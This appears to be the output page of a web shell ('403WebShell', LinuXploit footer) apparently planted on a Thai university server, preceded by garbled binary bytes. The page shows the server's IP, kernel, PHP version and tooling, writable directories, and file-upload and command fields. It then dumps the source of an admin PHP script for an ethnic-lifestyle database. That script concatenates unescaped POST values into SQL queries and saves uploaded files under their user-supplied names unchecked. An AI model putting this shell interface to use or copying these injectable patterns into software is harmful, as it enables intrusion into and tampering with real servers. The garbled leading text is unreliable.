h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/trr/sample/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/trr/sample/lifestyle_edit_db.php
<?ob_start();?>
<?php include 'check_mode_admin.php';?>
<?php include 'admin_dbconnect.php';?>
<?php include 'header.php';?>
<?php
if ($_POST["submit"])
{
	if ($_POST["lifestyle_ethieGroup_id"])
	{
		$lifestyle_ethieGroup_id = $_POST["lifestyle_ethieGroup_id"];
		$strSQL = "SELECT * from lifestyle WHERE lifestyle_ethieGroup_id=" . $lifestyle_ethieGroup_id;
		$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
		if($objResult = mysql_fetch_array($objQuery)) //มี person_id?	
		{		
			//update lifestyle
			if (phpversion() >= 5.4)
			{
			$strSQL = "UPDATE lifestyle ";
			$strSQL .= "SET ref_lifestyleTypeMain_id=" . $_POST["ref_lifestyleTypeMain_id"] . ",";
			$strSQL .= "ref_lifestyle_pop_id=" . $_POST["ref_lifestyle_pop_id"] . ",";
			$strSQL .= "ref_lifestyle_ref_id=" . $_POST["ref_lifestyle_ref_id"] . ",";			
			$strSQL .= "lifestyle_ethicGroup_name='" . addslashes($_POST["lifestyle_ethicGroup_name"]) . "',";
			$strSQL .= "lifestyle_selfCall='" . addslashes($_POST["lifestyle_selfCall"]) . "',";
			$strSQL .= "lifestyle_otherCall='" . addslashes($_POST["lifestyle_otherCall"]) . "',";
			$strSQL .= "lifestyle_languages='" . addslashes($_POST["lifestyle_languages"]) . "',";
			$strSQL .= "lifestyle_historical='" . addslashes($_POST["lifestyle_historical"]) . "',";
			$strSQL .= "lifestyle_intro='" . addslashes($_POST["lifestyle_intro"]) . "',";
			$strSQL .= "lifestyle_history='" . addslashes($_POST["lifestyle_history"]) . "',";
			$strSQL .= "lifestyle_humanLife='" . addslashes($_POST["lifestyle_humanLife"]) . "',";
			$strSQL .= "lifestyle_relative='" . addslashes($_POST["lifestyle_relative"]) . "',";
			$strSQL .= "lifestyle_relativName='" . addslashes($_POST["lifestyle_relativName"]) . "',";
			$strSQL .= "lifestyle_costume='" . addslashes($_POST["lifestyle_costume"]) . "',";
			$strSQL .= "lifestyle_houseStyle='" . addslashes($_POST["lifestyle_houseStyle"]) . "',";
			$strSQL .= "lifestyle_birth='" . addslashes($_POST["lifestyle_birth"]) . "',";
			$strSQL .= "lifestyle_marriage='" . addslashes($_POST["lifestyle_marriage"]) . "',";
			$strSQL .= "lifestyle_newyear='" . addslashes($_POST["lifestyle_newyear"]) . "',";
			$strSQL .= "lifestyle_beach_tradition='" . addslashes($_POST["lifestyle_beach_tradition"]) . "', ";
			$strSQL .= "lifestyle_religion_trust='" . addslashes($_POST["lifestyle_religion_trust"]) . "', ";
			$strSQL .= "lifestyle_thaiGhost_tradition='" . addslashes($_POST["lifestyle_thaiGhost_tradition"]) . "', ";
			$strSQL .= "lifestyle_spirit_sacred='" . addslashes($_POST["lifestyle_spirit_sacred"]) . "', ";
			$strSQL .= "lifestyle_rite='" . addslashes($_POST["lifestyle_rite"]) . "', ";
			$strSQL .= "lifestyle_music_arts='" . addslashes($_POST["lifestyle_music_arts"]) . "', ";
			$strSQL .= "lifestyle_song='" . addslashes($_POST["lifestyle_song"]) . "', ";
			$strSQL .= "lifestyle_legend='" . addslashes($_POST["lifestyle_legend"]) . "', ";
			$strSQL .= "lifestyle_situation='" . addslashes($_POST["lifestyle_situation"]) . "', ";
			$strSQL .= "lifestyle_changes_problems='" . addslashes($_POST["lifestyle_changes_problems"]) . "', ";
			$strSQL .= "lifestyle_networking='" . addslashes($_POST["lifestyle_networking"]) . "' ";
			}
			else
			{			
			$strSQL = "UPDATE lifestyle ";
			$strSQL .= "SET ref_lifestyleTypeMain_id=" . $_POST["ref_lifestyleTypeMain_id"] . ",";
			$strSQL .= "ref_lifestyle_pop_id=" . $_POST["ref_lifestyle_pop_id"] . ",";
			$strSQL .= "ref_lifestyle_ref_id=" . $_POST["ref_lifestyle_ref_id"] . ",";			
			$strSQL .= "lifestyle_ethicGroup_name='" . $_POST["lifestyle_ethicGroup_name"] . "',";
			$strSQL .= "lifestyle_selfCall='" . $_POST["lifestyle_selfCall"] . "',";
			$strSQL .= "lifestyle_otherCall='" . $_POST["lifestyle_otherCall"] . "',";
			$strSQL .= "lifestyle_languages='" . $_POST["lifestyle_languages"] . "',";
			$strSQL .= "lifestyle_historical='" . $_POST["lifestyle_historical"] . "',";
			$strSQL .= "lifestyle_intro='" . $_POST["lifestyle_intro"] . "',";
			$strSQL .= "lifestyle_history='" . $_POST["lifestyle_history"] . "',";
			$strSQL .= "lifestyle_humanLife='" . $_POST["lifestyle_humanLife"] . "',";
			$strSQL .= "lifestyle_relative='" . $_POST["lifestyle_relative"] . "',";
			$strSQL .= "lifestyle_relativName='" . $_POST["lifestyle_relativName"] . "',";
			$strSQL .= "lifestyle_costume='" . $_POST["lifestyle_costume"] . "',";
			$strSQL .= "lifestyle_houseStyle='" . $_POST["lifestyle_houseStyle"] . "',";
			$strSQL .= "lifestyle_birth='" . $_POST["lifestyle_birth"] . "',";
			$strSQL .= "lifestyle_marriage='" . $_POST["lifestyle_marriage"] . "',";
			$strSQL .= "lifestyle_newyear='" . $_POST["lifestyle_newyear"] . "',";
			$strSQL .= "lifestyle_beach_tradition='" . $_POST["lifestyle_beach_tradition"] . "', ";
			$strSQL .= "lifestyle_religion_trust='" . $_POST["lifestyle_religion_trust"] . "', ";
			$strSQL .= "lifestyle_thaiGhost_tradition='" . $_POST["lifestyle_thaiGhost_tradition"] . "', ";
			$strSQL .= "lifestyle_spirit_sacred='" . $_POST["lifestyle_spirit_sacred"] . "', ";
			$strSQL .= "lifestyle_rite='" . $_POST["lifestyle_rite"] . "', ";
			$strSQL .= "lifestyle_music_arts='" . $_POST["lifestyle_music_arts"] . "', ";
			$strSQL .= "lifestyle_song='" . $_POST["lifestyle_song"] . "', ";
			$strSQL .= "lifestyle_legend='" . $_POST["lifestyle_legend"] . "', ";
			$strSQL .= "lifestyle_situation='" . $_POST["lifestyle_situation"] . "', ";
			$strSQL .= "lifestyle_changes_problems='" . $_POST["lifestyle_changes_problems"] . "', ";
			$strSQL .= "lifestyle_networking='" . $_POST["lifestyle_networking"] . "' ";
			}
			if ($_FILES["lifestyle_photo"]["name"])
			{
				$lifestyle_photo = $lifestyle_image_path_db . $_FILES["lifestyle_photo"]["name"];
				$strSQL .= ",lifestyle_photo='" . $lifestyle_photo . "' ";
			}			
			$strSQL .= " WHERE lifestyle_ethieGroup_id=" . $lifestyle_ethieGroup_id;
			$objQuery = mysql_query($strSQL);
			if($objQuery) //บันทึกลง person
			{
				echo "บันทึกข้อมูลเรียบร้อยแล้ว<BR><BR>";

				//ถ้ามีการเปลี่ยนภาพ อัพโหลดภาพใหม่
				if ($_FILES["lifestyle_photo"]["name"])
				{
					if(move_uploaded_file($_FILES["lifestyle_photo"]["tmp_name"],$lifestyle_image_path_upload.$_FILES["lifestyle_photo"]["name"]))
					{
						echo "บันทึกไฟล์ภาพเรียบร้อยแล้ว<BR>";
					}
					else  
					{
						echo "ไม่สามารถบันทึกไฟล์ภาพได้<BR>";
					}
				}	//if ($_FILES["person_photo"]["name"])


				$redirect_url = "lifestyle_detail.php?lifestyle_ethieGroup_id=" . $lifestyle_ethieGroup_id;
				header("location:$redirect_url");
			} 
			else //if($objQuery) //บันทึกลง person
			{
				echo $strSQL;
				echo "ไม่สามารถบันทึกข้อมูลได้<BR><BR>";
			} //if($objQuery) //บันทึกลง person
		}
		else //		if($objResult = mysql_fetch_array($objQuery)) //มี person_id?	
		{
			echo "ไม่พบรายการที่เลือก<BR>";		
		} //		if($objResult = mysql_fetch_array($objQuery)) //มี person_id?		
	}
	else //if ($_POST["person_id"])
	{
		echo "ไม่พบรายการที่เลือก<BR>";
	} //if ($_POST["person_id"])
} //if ($_POST["submit"])
?>

Youez - 2016 - github.com/yon3zu
LinuXploit